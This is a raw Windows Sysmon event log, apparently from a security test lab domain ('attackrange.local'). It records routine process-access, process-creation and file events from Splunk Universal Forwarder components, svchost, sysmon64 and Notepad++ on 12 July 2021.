07:49:50.747{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.733{466BC892-F41E-60EB-167D-00000000CF01}9888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.547{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1831B9345B25425AFB76263131E3D86,SHA256=4B99962F98D2D7872C335A8B4A4CBD3E72033B19E2E53DC806A973AF8B50426C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807122Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:50.178{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1243147C97AC146EC54C3D7A538E3CFF,SHA256=8DF424A374447BAAE5526ED2F878769D0BAC95E8205904D1ECCA88DF26D9B67C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.216{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F41E-60EB-157D-00000000CF01}4712C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.216{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:50.216{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.216{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:50.216{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.216{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F41E-60EB-157D-00000000CF01}4712C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.216{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F41E-60EB-157D-00000000CF01}4712C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.195{466BC892-F41E-60EB-157D-00000000CF01}4712C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.196{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=AA1F8526B0AFFC4E3840B3165664785F,SHA256=443B85D8E0606F587CA63BD7A37FFF32C28A0B30A460BB7FA5F784E63FC29AA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:51.563{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF22973B2D078B3BF21CCCFC18C8D948,SHA256=CCFB329B5D081A196E7D0909DFA559A824061A7684FB9F8F4B79463104A7262B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807123Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:51.178{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B09C7A523447DD0C58A31262855B621,SHA256=2B80CEF08A71E4FF799D931F6873535FB01D9C0ED82B1B662CCC1829C6F6B7D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:51.517{466BC892-F41F-60EB-177D-00000000CF01}40728676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:51.348{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F41F-60EB-177D-00000000CF01}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:51.348{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:51.348{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:51.348{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:51.348{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:51.348{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F41F-60EB-177D-00000000CF01}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:51.332{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F41F-60EB-177D-00000000CF01}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:51.334{466BC892-F41F-60EB-177D-00000000CF01}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:51.200{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=35798E96A423142F9BC2AB053AC74EE1,SHA256=5C1E958B4EB8F4B21197E7F264A863DACC34DA5526353BE26CD3D6B2F0167A9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:51.199{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=71CAD346828D8FC4430FE3D1E1023B9C,SHA256=92CED77414B02D147A8DF9AF9E06AE42171D940E6BE152AF619631097D8D4294,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047909Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.864{466BC892-F420-60EB-197D-00000000CF01}764010232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047908Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.648{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F420-60EB-197D-00000000CF01}7640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047907Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:52.648{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047906Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:52.648{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047905Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:52.648{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047904Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 